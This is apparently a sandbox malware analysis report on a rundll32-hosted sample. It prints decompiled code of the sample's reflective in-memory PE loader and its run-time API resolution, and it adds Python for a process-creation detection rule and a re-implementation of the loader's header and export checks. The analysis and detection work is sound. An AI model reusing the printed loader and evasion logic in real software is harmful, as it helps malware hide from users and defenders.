    Memory Dump Source
    • Source File: 00000003.00000002.662633575.00000000011B1000.00000020.00000001.sdmp, Offset: 011B0000, based on PE: true
    • Associated: 00000003.00000002.662614711.00000000011B0000.00000004.00000001.sdmp
    • Associated: 00000003.00000002.662646662.00000000011B3000.00000002.00000001.sdmp
    • Associated: 00000003.00000002.662686050.00000000011B4000.00000004.00000001.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_11b0000_rundll32.jbxd
    Similarity
    • API ID: ErrorLast
    • String ID:
    • API String ID: 1452528299-0
    • Opcode ID: 08829c6ef4e7119b918c41de79640e5c2b5795e652099f8828019aad6a16ec33
    • Instruction ID: e74ce97e551943bb97c2aef895adb9fea17ca2de8ad985e3347358a3a91ba7b0
    • Opcode Fuzzy Hash: 08829c6ef4e7119b918c41de79640e5c2b5795e652099f8828019aad6a16ec33
    • Instruction Fuzzy Hash: 0151F974A00109DFCB18CF98C5C1BAEBBB2FF48305F208169D515AB345D735EA85CB91
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
      • Part of subcall function 011647F6: atoi.MSVCRT ref: 011648F0
      • Part of subcall function 011647F6: _initterm.MSVCRT ref: 01164905
    • DisableThreadLibraryCalls.KERNEL32(00003A98), ref: 0116431C
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.662420469.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_1160000_rundll32.jbxd
    Similarity
    • API ID: CallsDisableLibraryThread_inittermatoi
    • String ID: EL32.dll$dll
    • API String ID: 2582834166-3514254202
    • Opcode ID: 3677c87e7301b03a0ea7938c50ba3f2ac51d1810227c807ec84151f250858ddc
    • Instruction ID: dd9d933d66306aed5d9aec51c9ff6209b572d69eaa990356ff7031291175581c
    • Opcode Fuzzy Hash: 3677c87e7301b03a0ea7938c50ba3f2ac51d1810227c807ec84151f250858ddc
    • Instruction Fuzzy Hash: 1021D872E001189BEB08DBE8CC95ADFBB7DFF44304F144028E505AB244D776AA16CB91
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • VirtualProtect.KERNEL32(?,00000040,00000004,?), ref: 011A2468
    • VirtualProtect.KERNEL32(00000000,000000F8,00000004,?), ref: 011A24B2
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.662490371.00000000011A1000.00000020.00000001.sdmp, Offset: 011A1000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_11a1000_rundll32.jbxd
    Similarity
    • API ID: ProtectVirtual
    • String ID: @
    • API String ID: 544645111-2766056989
    • Opcode ID: b58882c73062134d6b8c6c2542e5ba6d8bfaa6c598acfbe0382362eb876bd77e
    • Instruction ID: d6bb4cb8ae4040c6b4755268a7d96e7ab53a0ed4eb2f0232ad8187578ce22d15
    • Opcode Fuzzy Hash: b58882c73062134d6b8c6c2542e5ba6d8bfaa6c598acfbe0382362eb876bd77e
    • Instruction Fuzzy Hash: 4721E8B4A04209EFDF18CF98C980BADBFB5BF44304F648199D916AB245C774AB80DB55
    Uniqueness

    Uniqueness Score: -1.00%

    Execution Graph

    Execution Coverage:23.6%
    Dynamic/Decrypted Code Coverage:100%
    Signature Coverage:0%
    Total number of Nodes:294
    Total number of Limit Nodes:14

    Graph

    execution_graph: rendered in the original report as an interactive node/edge graph; the raw node list is omitted here. What it records: the rundll32 entry code at 0x1150000 and 0x1154000 (repeated GetPEB walks, GetNativeSystemInfo, VirtualAlloc, VirtualProtect, LoadLibraryW/GetProcAddress, CRT start-up through atoi/_initterm/_onexit, ExitProcess); the reflective loader copies at 0x1191000 and 0x11a1000 (LoadLibraryW/LoadLibraryA/LoadLibraryExA, GetProcAddress, GetPEB, GetNativeSystemInfo, VirtualAlloc/VirtualQuery/VirtualProtect/VirtualFree, GetProcessHeap with RtlAllocateHeap/HeapAlloc/HeapFree, IsBadReadPtr/IsBadHugeReadPtr, bsearch, FreeLibrary, and SetLastError on every failure path); and the mapped payload entered at 0x3371010, whose subcalls E033711A0, E03371040 and E033710B0 make 13, 6 and 21 API calls respectively.

    Executed Functions

    Control-flow Graph

    control_flow_graph: the original shows the executed and not-executed basic blocks of the routine at 0x1191030 as a graph; the edge list is omitted here. Path recorded: LoadLibraryW and GetProcAddress at entry, a call to 0x1191b30 (which sets SetLastError(0xd) when the size check fails), a chain of header checks that each exit through SetLastError(0xc1), GetNativeSystemInfo, two calls to 0x11918d0, allocation through 0x1191800 and GetProcessHeap/RtlAllocateHeap, then the calls to 0x1191b50, 0x11921a0, 0x1191e80 and 0x1192010 in sequence (the execution graph shows VirtualAlloc, IsBadHugeReadPtr/VirtualQuery and VirtualProtect beneath them), a GetPEB access and the call into 0x11a1000; failure branches converge on the cleanup routine 0x11916c0 and the return at 0x119148d.
    APIs
    • LoadLibraryW.KERNEL32(01194054,01194040), ref: 01191047
    • GetProcAddress.KERNEL32(00000000), ref: 0119104E
      • Part of subcall function 01191B30: SetLastError.KERNEL32(0000000D,?,01191070,?,00000040), ref: 01191B3D
    • SetLastError.KERNEL32(000000C1), ref: 01191096
    Memory Dump Source
    • Source File: 00000004.00000002.667473154.0000000001191000.00000020.00000001.sdmp, Offset: 01191000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_1191000_rundll32.jbxd
    Similarity
    • API ID: ErrorLast$AddressLibraryLoadProc
    • String ID:
    • API String ID: 1866314245-0
    • Opcode ID: f5daf84b8892bb4d22cc349553edafac20890d228188a8bfa3a5b07b2c1bbd5a
    • Instruction ID: 062b3991f2beb898535cca05ba1c4f6bcbda3103100f6f9602e434ac9d990f30
    • Opcode Fuzzy Hash: f5daf84b8892bb4d22cc349553edafac20890d228188a8bfa3a5b07b2c1bbd5a
    • Instruction Fuzzy Hash: 09F1DCB4E01209EFDF08DF94D984AADB7B1BF48314F148598E925AB341D735EE81CB51
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    C-Code - Quality: 100%
    			// Payload initialisation: resolves its CRT and kernel32 imports at run time through
    			// LoadLibraryA/GetProcAddress (the "Extensive use of GetProcAddress" signature) and
    			// caches them in a global pointer table at module+0x3008..+0x3030, so the static
    			// import table shows none of them. The copy of this module mapped at 0x04850000 calls
    			// the +0x3018 slot (CreateProcessA) with "C:\" as working directory.
    			E033711A0() {
    				struct HINSTANCE__* _v8;
    				struct HINSTANCE__* _v12;
    				void* _t32;
    				void* _t40;
    
    				_v8 = LoadLibraryA("msvcrt.dll");
    				_v12 = LoadLibraryA("kernel32.dll");
    				 *0x3373010 = GetProcAddress(_v8, "realloc");
    				 *0x3373020 = GetProcAddress(_v8, "exit");
    				 *0x3373024 = GetProcAddress(_v8, "strncmp");
    				 *0x3373008 = GetProcAddress(_v8, "free");
    				 *0x337300c = GetProcAddress(_v8, "malloc");
    				 *0x3373014 = GetProcAddress(_v12, "CreateDirectoryA");
    				 *0x3373018 = GetProcAddress(_v12, "CreateProcessA"); // slot used for the process launch
    				 *0x337301c = GetProcAddress(_v12, "DeleteFileA");
    				 *0x3373028 = GetProcAddress(_v8, "memset");
    				 *0x3373030 = GetProcAddress(_v8, "memcpy");
    				 *0x337302c = GetProcAddress(_v8, "strstr"); // executed
    				E03371040(); // executed; calls CreateDirectoryA (see the subcall list below)
    				_t32 = E033710B0(_t40); // executed; includes Sleep(0x3A98) = 15 s before continuing
    				return _t32;
    			}







    0x033711b1
    0x033711bf
    0x033711d1
    0x033711e5
    0x033711f9
    0x0337120d
    0x03371221
    0x03371235
    0x03371249
    0x0337125d
    0x03371271
    0x03371285
    0x03371299
    0x0337129e
    0x033712a3
    0x033712ab

    APIs
    • LoadLibraryA.KERNEL32(msvcrt.dll), ref: 033711AB
    • LoadLibraryA.KERNEL32(kernel32.dll), ref: 033711B9
    • GetProcAddress.KERNEL32(00000001,realloc), ref: 033711CB
    • GetProcAddress.KERNEL32(00000001,exit), ref: 033711DF
    • GetProcAddress.KERNEL32(00000001,strncmp), ref: 033711F3
    • GetProcAddress.KERNEL32(00000001,free), ref: 03371207
    • GetProcAddress.KERNEL32(00000001,malloc), ref: 0337121B
    • GetProcAddress.KERNEL32(?,CreateDirectoryA), ref: 0337122F
    • GetProcAddress.KERNEL32(?,CreateProcessA), ref: 03371243
    • GetProcAddress.KERNEL32(?,DeleteFileA), ref: 03371257
    • GetProcAddress.KERNEL32(00000001,memset), ref: 0337126B
    • GetProcAddress.KERNEL32(00000001,memcpy), ref: 0337127F
    • GetProcAddress.KERNEL32(00000001,strstr), ref: 03371293
      • Part of subcall function 03371040: CreateDirectoryA.KERNELBASE(?,00000000,?,?,?,?,?,?,033712A3), ref: 0337108A
      • Part of subcall function 033710B0: Sleep.KERNEL32(00003A98), ref: 03371166
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.668060924.0000000003371000.00000020.00000001.sdmp, Offset: 03370000, based on PE: true
    • Associated: 00000004.00000002.668050457.0000000003370000.00000004.00000001.sdmp
    • Associated: 00000004.00000002.668070742.0000000003372000.00000002.00000001.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_3370000_rundll32.jbxd
    Similarity
    • API ID: AddressProc$LibraryLoad$CreateDirectorySleep
    • String ID: CreateDirectoryA$CreateProcessA$DeleteFileA$exit$free$kernel32.dll$malloc$memcpy$memset$msvcrt.dll$realloc$strncmp$strstr
    • API String ID: 2158191583-3107153655
    • Opcode ID: 0e111d47c250533cd9a00f8a2c0f40adc0529c3c7b409797da5ac8e23b704580
    • Instruction ID: e3919abfa4fcfed70c10c8bb4caaa5d584c5df67eb9503ebb2bc25ce96a6f94e
    • Opcode Fuzzy Hash: 0e111d47c250533cd9a00f8a2c0f40adc0529c3c7b409797da5ac8e23b704580
    • Instruction Fuzzy Hash: 0C21BAB9940304EFC730EFA0D9C996E7B79F748711F200D59EA92D6209D67C9900EBB1
    Uniqueness

    Uniqueness Score: -1.00%
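    The two payload routines above give a concrete process-creation signature: a DLL host (rundll32.exe) runs CreateProcessA on an executable inside a freshly created first-level C:\ProgramData subfolder, with lpCommandLine NULL and lpCurrentDirectory "C:\". The following Python is an added example, not part of the report or of the sample: it scores constructed Sysmon-style Event ID 1 records against those features. The record format ("Key: value|Key: value"), the sample records, the DLL_HOSTS set and the threshold of 3 are assumptions for the example; only the dropped path, the rundll32 parent and the "C:\" working directory come from the decompiled code.

```python
import re

# Constructed Sysmon-style process-creation records (Event ID 1 field names). They are
# made up for this example; only the dropped path C:\ProgramData\huqvg\huqvg.exe, the
# rundll32 parent and the "C:\" working directory come from the decompiled call.
SAMPLE_EVENTS = [
    "Image: C:\\ProgramData\\huqvg\\huqvg.exe|CommandLine: C:\\ProgramData\\huqvg\\huqvg.exe"
    "|CurrentDirectory: C:\\|ParentImage: C:\\Windows\\SysWOW64\\rundll32.exe",
    "Image: C:\\ProgramData\\Acme\\tool.exe|CommandLine: \"C:\\ProgramData\\Acme\\tool.exe\" --update"
    "|CurrentDirectory: C:\\ProgramData\\Acme\\|ParentImage: C:\\Windows\\explorer.exe",
    "Image: C:\\Windows\\System32\\notepad.exe|CommandLine: notepad.exe"
    "|CurrentDirectory: C:\\Users\\user\\|ParentImage: C:\\Windows\\SysWOW64\\rundll32.exe",
]

# Executable in a first-level ProgramData subfolder: C:\ProgramData\<folder>\<name>.exe
DROP_PATH = re.compile(r"^c:\\programdata\\([^\\]+)\\([^\\]+)\.exe$", re.I)
DLL_HOSTS = {"rundll32.exe"}   # assumption: extend with other DLL hosts as your environment needs


def parse_event(line):
    """'Key: value|Key: value' -> dict. Values may contain ':' but not '|'."""
    fields = {}
    for part in line.split("|"):
        key, _, value = part.partition(": ")
        fields[key.strip()] = value.strip()
    return fields


def score_event(ev):
    """Return (score, reasons) for one record. The ProgramData-subfolder feature is
    mandatory; each further reason is one property of the decompiled CreateProcessA call."""
    image = ev.get("Image", "")
    m = DROP_PATH.match(image)
    if not m:
        return 0, []
    reasons = ["executable launched from a first-level C:\\ProgramData subfolder"]
    folder, exe = m.group(1).lower(), m.group(2).lower()
    if folder == exe:
        reasons.append("folder name equals executable name (huqvg\\huqvg.exe pattern)")
    if ev.get("ParentImage", "").rsplit("\\", 1)[-1].lower() in DLL_HOSTS:
        reasons.append("parent is a DLL host process (rundll32.exe)")
    if ev.get("CurrentDirectory", "").rstrip("\\").lower() == "c:":
        reasons.append('working directory is "C:\\" (lpCurrentDirectory in the decompiled call)')
    if ev.get("CommandLine", "").strip('"').lower() == image.lower():
        reasons.append("command line is the bare image path (lpCommandLine=NULL, lpApplicationName set)")
    return len(reasons), reasons


def detect(lines, threshold=3):
    """Return [(image, score, reasons)] for every record scoring at or above threshold."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append((ev["Image"], score, reasons))
    return hits


if __name__ == "__main__":
    for image, score, reasons in detect(SAMPLE_EVENTS):
        print(image, score, *reasons, sep="\n  ")
```

    On the constructed records only the huqvg.exe launch reaches the threshold (all five features); a vendor updater under a two-level ProgramData path started by explorer.exe scores 1 and a System32 binary started by rundll32.exe scores 0. The folder-equals-filename feature is one scoring input, not a hard requirement, so other droppers that reuse the same launch pattern with different naming are still caught by the remaining features.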

    Control-flow Graph

    control_flow_graph: executed/not-executed block graph of E011A1B50 (0x11a1b50) in the original; the edge list is omitted here. The path recorded runs through the 0x11a1270 size checks and the header checks (each failure branch ending in SetLastError), GetNativeSystemInfo, VirtualAlloc (at ImageBase, with a fallback at any address), GetProcessHeap/HeapAlloc (failure: VirtualFree and SetLastError), a second VirtualAlloc followed by calls to 0x11a10d0 and 0x11a12a0, then 0x11a17b0, 0x11a18c0, 0x11a15b0 and 0x11a1730, and finally the call into 0x3371010; every error exit passes through 0x11a2120.
    C-Code - Quality: 90%
    			// Reflective PE loader (structure of MemoryModule's MemoryLoadLibraryEx): _a4 = raw PE
    			// in memory, _a8 = its size, _a12.._a24 = values stored in the module record at
    			// +0x1c..+0x28 (MemoryModule keeps its alloc/free/LoadLibrary/GetProcAddress callbacks
    			// there). Error codes: 0xc1 ERROR_BAD_EXE_FORMAT, 0xe ERROR_OUTOFMEMORY,
    			// 0x45a ERROR_DLL_INIT_FAILED. Returns the module record or 0.
    			E011A1B50(intOrPtr __ecx, signed short* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
    				void* _v8;
    				intOrPtr* _v12;
    				void* _v16;
    				intOrPtr _v20;
    				intOrPtr _v24;
    				signed short* _v28;
    				void* _v32;
    				void* _v36;
    				void* _v40;
    				long _v44;
    				void* _v48;
    				void* _v52;
    				intOrPtr _v56;
    				intOrPtr _v60;
    				intOrPtr _v64;
    				intOrPtr _v68;
    				intOrPtr _v100;
    				char _v104;
    				void* _t184;
    				void* _t195;
    				void* _t202;
    				void* _t205;
    				void* _t206;
    				void* _t223;
    				intOrPtr _t320;
    
    				_v20 = __ecx;
    				_v8 = 0;
    				_v40 = 0;
    				if(E011A1270(_v20, _a8, 0x40) != 0) { // E011A1270 = size check: at least sizeof(IMAGE_DOS_HEADER) bytes
    					_v28 = _a4;
    					if(( *_v28 & 0x0000ffff) == 0x5a4d) { // 'MZ'
    						if(E011A1270(_v20, _a8, _v28[0x1e] + 0xf8) != 0) { // e_lfanew (word index 0x1e = offset 0x3c) + sizeof(IMAGE_NT_HEADERS32)
    							_v12 = _a4 + _v28[0x1e]; // IMAGE_NT_HEADERS
    							if( *_v12 == 0x4550) { // 'PE\0\0'
    								_t19 = _v12 + 4; // 0x3
    								if(( *_t19 & 0x0000ffff) == 0x14c) { // FileHeader.Machine == IMAGE_FILE_MACHINE_I386
    									_t21 = _v12 + 0x38; // 0x0
    									if(( *_t21 & 0x00000001) == 0) { // SectionAlignment must be even
    										_t23 = _v12 + 0x14; // 0x0
    										_t26 = ( *_t23 & 0x0000ffff) + 0x18; // 0x11a4018
    										_v24 = _v12 + _t26; // first IMAGE_SECTION_HEADER = NT headers + 0x18 + SizeOfOptionalHeader
    										_t29 = _v12 + 0x38; // 0x0
    										_v60 =  *_t29; // SectionAlignment
    										_v32 = 0;
    										while(1) {
    											_t37 = _v12 + 6; // 0x40000
    											if(_v32 >= ( *_t37 & 0x0000ffff)) { // FileHeader.NumberOfSections
    												break;
    											}
    											if( *((intOrPtr*)(_v24 + 0x10)) != 0) { // SizeOfRawData
    												_v36 =  *((intOrPtr*)(_v24 + 0xc)) +  *((intOrPtr*)(_v24 + 0x10)); // VirtualAddress + SizeOfRawData
    											} else {
    												_v36 =  *((intOrPtr*)(_v24 + 0xc)) + _v60; // empty section still occupies one alignment unit
    											}
    											if(_v36 > _v40) {
    												_v40 = _v36; // highest section end seen so far
    											}
    											_v32 = _v32 + 1;
    											_v24 = _v24 + 0x28; // sizeof(IMAGE_SECTION_HEADER)
    										}
    										__imp__GetNativeSystemInfo( &_v104); // executed; _v100 = dwPageSize
    										_t56 = _v12 + 0x50; // 0x70207369
    										_t59 = _v100 - 1; // 0x70207368
    										_v44 =  *_t56 + _t59 &  !(_v100 - 1); // SizeOfImage rounded up to the page size
    										_t65 = _v100 - 1; // -1
    										if(_v44 == (_v40 + _t65 &  !(_v100 - 1))) { // must match the computed section span
    											_t70 = _v12 + 0x34; // 0x0
    											_t184 = VirtualAlloc( *_t70, _v44, 0x3000, 4); // executed; try the preferred ImageBase, MEM_COMMIT|MEM_RESERVE, PAGE_READWRITE
    											_v16 = _t184;
    											if(_v16 != 0) {
    												L26:
    												_v8 = HeapAlloc(GetProcessHeap(), 8, 0x34); // zero-initialised module record: +4 base, +0x10 initialized, +0x14 isDLL, +0x18 isRelocated, +0x2c entry point, +0x30 page size
    												if(_v8 != 0) {
    													 *((intOrPtr*)(_v8 + 4)) = _v16;
    													_t83 = _v12 + 0x16; // 0x400000
    													if(( *_t83 & 0x2000) == 0) { // FileHeader.Characteristics & IMAGE_FILE_DLL
    														_v48 = 0;
    													} else {
    														_v48 = 1;
    													}
    													 *(_v8 + 0x14) = _v48;
    													 *((intOrPtr*)(_v8 + 0x1c)) = _a12;
    													 *((intOrPtr*)(_v8 + 0x20)) = _a16;
    													 *((intOrPtr*)(_v8 + 0x24)) = _a20;
    													 *((intOrPtr*)(_v8 + 0x28)) = _a24;
    													 *((intOrPtr*)(_v8 + 0x30)) = _v100;
    													_t105 = _v12 + 0x54; // 0x72676f72
    													if(E011A1270(_v20, _a8,  *_t105) != 0) { // input must hold SizeOfHeaders bytes
    														_t109 = _v12 + 0x54; // 0x72676f72
    														_t195 = VirtualAlloc(_v16,  *_t109, 0x1000, 4); // executed; commit the header pages
    														_v52 = _t195;
    														_t113 = _v12 + 0x54; // 0x72676f72
    														E011A10D0(_v52, _v28,  *_t113); // copy SizeOfHeaders bytes of the raw PE
    														 *_v8 = _v52 + _v28[0x1e]; // record->headers
    														 *((intOrPtr*)( *_v8 + 0x34)) = _v16; // patch OptionalHeader.ImageBase to the actual base
    														_t202 = E011A12A0(_v20, _a4, _a8, _v12, _v8); // executed; copy the sections (VirtualAlloc per section)
    														if(_t202 != 0) {
    															_t131 = _v12 + 0x34; // 0x0
    															_t320 =  *((intOrPtr*)( *_v8 + 0x34)) -  *_t131; // actual base - preferred ImageBase
    															_v56 = _t320;
    															if(_t320 == 0) {
    																 *((intOrPtr*)(_v8 + 0x18)) = 1;
    															} else {
    																 *((intOrPtr*)(_v8 + 0x18)) = E011A17B0(_v20, _v8, _v56); // apply base relocations
    															}
    															_t205 = E011A18C0(_v20, _v8); // executed; resolve imports (LoadLibraryA in its subcalls)
    															if(_t205 != 0) {
    																_t206 = E011A15B0(_v20, _v8); // executed; set final section protections (VirtualProtect)
    																if(_t206 != 0) {
    																	if(E011A1730(_v20, _v8) != 0) { // run TLS callbacks
    																		if( *((intOrPtr*)( *_v8 + 0x28)) == 0) { // AddressOfEntryPoint
    																			 *(_v8 + 0x2c) = 0;
    																			L52:
    																			return _v8;
    																		}
    																		if( *(_v8 + 0x14) == 0) { // EXE: remember the entry point, do not call it
    																			 *(_v8 + 0x2c) = _v16 +  *((intOrPtr*)( *_v8 + 0x28));
    																			L50:
    																			goto L52;
    																		}
    																		_v64 = _v16 +  *((intOrPtr*)( *_v8 + 0x28));
    																		_v68 = _v64(_v16, 1, 0); // DllMain(base, DLL_PROCESS_ATTACH, NULL); the control-flow graph records this call reaching 0x3371010
    																		if(_v68 != 0) {
    																			 *((intOrPtr*)(_v8 + 0x10)) = 1;
    																			goto L50;
    																		}
    																		SetLastError(0x45a); // ERROR_DLL_INIT_FAILED
    																		goto L53;
    																	}
    																	goto L53;
    																}
    																goto L53;
    															}
    															goto L53;
    														}
    														goto L53;
    													} else {
    														L53:
    														E011A2120(_v20, _v8); // free the mapping and the record
    														return 0;
    													}
    												}
    												VirtualFree(_v16, 0, 0x8000);
    												SetLastError(0xe); // ERROR_OUTOFMEMORY
    												return 0;
    											}
    											_t223 = VirtualAlloc(0, _v44, 0x3000, 4); // executed; fallback: any address (relocation needed)
    											_v16 = _t223;
    											if(_v16 != 0) {
    												goto L26;
    											}
    											SetLastError(0xe); // ERROR_OUTOFMEMORY
    											return 0;
    										}
    										SetLastError(0xc1); // ERROR_BAD_EXE_FORMAT
    										return 0;
    									}
    									SetLastError(0xc1);
    									return 0;
    								}
    								SetLastError(0xc1);
    								return 0;
    							}
    							SetLastError(0xc1);
    							return 0;
    						}
    						return 0;
    					}
    					SetLastError(0xc1);
    					return 0;
    				}
    				return 0;
    			}
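    The two decompiled routines E011A1B50 (header validation before the image is mapped) and E011B1FA0 (export lookup over the mapped image) are the parts of this loader an analyst most often needs to reproduce, for example to validate a dumped stage before carving it or to resolve the exports of a module that never appears in the PEB module list. The Python below is an added example, not code from the report or from the sample: it re-implements both routines with the same header offsets, the same checks in the same order and the same Win32 error codes, and runs them over a constructed minimal PE built in `build_sample_image()` (the export names Alpha/Beta, the RVAs and the 0x2000-byte layout are made up for the test). The only deliberate departure from the decompiled logic is the corrected `>=` bound on the ordinal index, noted in the code.

```python
import struct

# Win32 error codes the decompiled loader reports through SetLastError
ERROR_PROC_NOT_FOUND = 0x7F    # every failure path in E011B1FA0
ERROR_BAD_EXE_FORMAT = 0xC1    # header checks in E011A1B50
IMAGE_FILE_MACHINE_I386 = 0x14C

class LoaderError(Exception):
    def __init__(self, code):
        super().__init__("loader error 0x%x" % code)
        self.code = code

def u16(b, off): return struct.unpack_from("<H", b, off)[0]
def u32(b, off): return struct.unpack_from("<I", b, off)[0]

def validate_headers(image, page_size=0x1000):
    """The header checks of E011A1B50, in its order, on the raw PE bytes it receives.
    Returns the byte count the loader hands to VirtualAlloc (SizeOfImage rounded up to
    page_size) or raises LoaderError(ERROR_BAD_EXE_FORMAT)."""
    if len(image) < 0x40 or u16(image, 0) != 0x5A4D:              # 'MZ'
        raise LoaderError(ERROR_BAD_EXE_FORMAT)
    nt = u32(image, 0x3C)                                         # e_lfanew (_v28[0x1e])
    if nt + 0xF8 > len(image) or u32(image, nt) != 0x4550:        # room for NT headers, 'PE\0\0'
        raise LoaderError(ERROR_BAD_EXE_FORMAT)
    if u16(image, nt + 4) != IMAGE_FILE_MACHINE_I386:             # FileHeader.Machine == 0x14c
        raise LoaderError(ERROR_BAD_EXE_FORMAT)
    section_align = u32(image, nt + 0x38)                         # OptionalHeader.SectionAlignment
    if section_align & 1:
        raise LoaderError(ERROR_BAD_EXE_FORMAT)
    # Section table at nt + 0x18 + SizeOfOptionalHeader: find the highest section end;
    # a section with SizeOfRawData == 0 still occupies one SectionAlignment unit.
    sect = nt + 0x18 + u16(image, nt + 0x14)
    last_end = 0
    for _ in range(u16(image, nt + 6)):                           # FileHeader.NumberOfSections
        va, raw = u32(image, sect + 0x0C), u32(image, sect + 0x10)
        last_end = max(last_end, va + (raw or section_align))
        sect += 0x28
    align = lambda v: (v + page_size - 1) & ~(page_size - 1)
    size_of_image = u32(image, nt + 0x50)                         # OptionalHeader.SizeOfImage
    if align(size_of_image) != align(last_end):                   # SizeOfImage must match the section span
        raise LoaderError(ERROR_BAD_EXE_FORMAT)
    return align(size_of_image)

def get_proc_address(mapped, name):
    """Export lookup with the semantics of E011B1FA0 over a mapped image (RVA == offset).
    `name` is a str (by-name lookup) or an int ordinal, standing in for the
    HIWORD(lpProcName) test; returns the export's RVA."""
    nt = u32(mapped, 0x3C)
    exp, exp_size = u32(mapped, nt + 0x78), u32(mapped, nt + 0x7C)   # DataDirectory[EXPORT]
    if exp_size == 0:
        raise LoaderError(ERROR_PROC_NOT_FOUND)
    base = u32(mapped, exp + 0x10)                                    # ordinal Base
    n_funcs, n_names = u32(mapped, exp + 0x14), u32(mapped, exp + 0x18)
    if n_funcs == 0 or n_names == 0:
        raise LoaderError(ERROR_PROC_NOT_FOUND)
    funcs, names, ords = (u32(mapped, exp + o) for o in (0x1C, 0x20, 0x24))
    if isinstance(name, str):
        want = name.encode()
        for i in range(n_names):                                      # linear scan of AddressOfNames
            rva = u32(mapped, names + 4 * i)
            if mapped[rva:mapped.index(b"\0", rva)] == want:
                idx = u16(mapped, ords + 2 * i)                       # AddressOfNameOrdinals[i]
                break
        else:
            raise LoaderError(ERROR_PROC_NOT_FOUND)
    else:
        if (name & 0xFFFF) < base:
            raise LoaderError(ERROR_PROC_NOT_FOUND)
        idx = (name & 0xFFFF) - base
    # The decompiled code tests `idx <= NumberOfFunctions`, which lets idx ==
    # NumberOfFunctions read one slot past AddressOfFunctions; corrected to `>=` here.
    if idx >= n_funcs:
        raise LoaderError(ERROR_PROC_NOT_FOUND)
    return u32(mapped, funcs + 4 * idx)

def last_error(fn, *args):
    """Call fn(*args); return the LoaderError code it raises, or None on success."""
    try:
        fn(*args)
    except LoaderError as err:
        return err.code
    return None

def build_sample_image():
    """Constructed test input, not taken from the sample: a minimal i386 PE whose only
    section sits at RVA 0x1000 == file offset 0x1000, so the same bytes are both the raw
    file for validate_headers() and the mapped image for get_proc_address().
    Exports: Alpha (ordinal 1, RVA 0x1100) and Beta (ordinal 2, RVA 0x1200)."""
    img = bytearray(0x2000)
    nt = 0x80
    struct.pack_into("<H", img, 0, 0x5A4D)
    struct.pack_into("<I", img, 0x3C, nt)
    struct.pack_into("<IHH", img, nt, 0x4550, IMAGE_FILE_MACHINE_I386, 1)  # signature, Machine, NumberOfSections
    struct.pack_into("<HHH", img, nt + 0x14, 0xE0, 0x2102, 0x10B)        # SizeOfOptionalHeader, Characteristics (DLL), PE32 magic
    struct.pack_into("<III", img, nt + 0x34, 0x400000, 0x1000, 0x200)    # ImageBase, SectionAlignment, FileAlignment
    struct.pack_into("<II", img, nt + 0x50, 0x2000, 0x400)               # SizeOfImage, SizeOfHeaders
    struct.pack_into("<I", img, nt + 0x74, 16)                           # NumberOfRvaAndSizes
    exp = 0x1000
    struct.pack_into("<II", img, nt + 0x78, exp, 0x100)                  # export directory RVA, Size
    struct.pack_into("<8sIIII", img, nt + 0x18 + 0xE0, b".edata", 0x1000, 0x1000, 0x1000, 0x1000)
    funcs, names, ords, strs = exp + 0x28, exp + 0x30, exp + 0x38, exp + 0x40
    # IMAGE_EXPORT_DIRECTORY: Base=1, NumberOfFunctions=2, NumberOfNames=2, then the three table RVAs
    struct.pack_into("<10I", img, exp, 0, 0, 0, 0, 1, 2, 2, funcs, names, ords)
    struct.pack_into("<II", img, funcs, 0x1100, 0x1200)
    struct.pack_into("<II", img, names, strs, strs + 6)
    struct.pack_into("<HH", img, ords, 0, 1)
    img[strs:strs + 11] = b"Alpha\0Beta\0"
    return bytes(img)

if __name__ == "__main__":
    pe = build_sample_image()
    print("loader would reserve 0x%x bytes" % validate_headers(pe))
    for export in ("Alpha", "Beta", 2):
        print(export, "-> RVA 0x%x" % get_proc_address(pe, export))
```

    To use it on a real dump, pass the bytes carved from the region's memory dump (RVA == offset already holds for a mapped image) to `get_proc_address`; `validate_headers` expects the raw, unmapped file the loader was given, which is why it still accepts a PE whose sections do not start at their RVAs.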

    Instruction addresses (one per decompiled line above): 0x011a1b56 .. 0x011a1f68

    APIs
      • Part of subcall function 011A1270: SetLastError.KERNEL32(0000000D,?,?,011A1B75,011A1025,00000040), ref: 011A1281
    • SetLastError.KERNEL32(000000C1,011A1025,00000040), ref: 011A1B98
    Memory Dump Source
    • Source File: 00000004.00000002.667595301.00000000011A1000.00000020.00000001.sdmp, Offset: 011A0000, based on PE: true
    • Associated: 00000004.00000002.667583917.00000000011A0000.00000004.00000001.sdmp Download File
    • Associated: 00000004.00000002.667605650.00000000011A3000.00000002.00000001.sdmp Download File
    • Associated: 00000004.00000002.667615894.00000000011A4000.00000004.00000001.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_11a0000_rundll32.jbxd
    Similarity
    • API ID: ErrorLast
    • String ID:
    • API String ID: 1452528299-0
    • Opcode ID: 1bff18bff92a32b05257ddc985b4c519ffcd6ff8b40bd9c2e6864145ef2ac28d
    • Instruction ID: 4b984727ffa06504312da888600dd5eb66a8d8684427021cff1a70818caea5fa
    • Opcode Fuzzy Hash: 1bff18bff92a32b05257ddc985b4c519ffcd6ff8b40bd9c2e6864145ef2ac28d
    • Instruction Fuzzy Hash: 51E11B78A00209EFDB08CFA8C994AAEBFB5FF48314F508559E515AB385D730AE85CF51
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    APIs
    • wsprintfA.USER32 ref: 0337173A
    • WSAStartup.WS2_32(00000102,?), ref: 0337174F
    • socket.WS2_32(00000002,00000001,00000006), ref: 03371766
    • gethostbyname.WS2_32(?), ref: 03371779
    • htons.WS2_32(?), ref: 0337178D
    • connect.WS2_32(?,?,00000010), ref: 033717D2
    • send.WS2_32(?,?,?,00000000), ref: 03371854
